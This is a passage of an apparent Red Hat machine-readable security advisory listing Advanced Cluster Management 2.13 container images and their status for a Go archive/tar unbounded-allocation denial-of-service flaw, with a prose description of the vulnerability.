"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2407258"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/tar package in the Go standard library. tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A specially crafted tar archive with a pax header indicating a big number of sparse regions can cause a Go program to try to allocate a large amount of memory, causing an out-of-memory condition and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to be able to process a specially crafted GNU tar pax 1.0 archive with the application using the archive/tar package. Additionally, this issue can cause the Go application to allocate a large amount of memory, eventually leading to an out-of-memory condition and resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
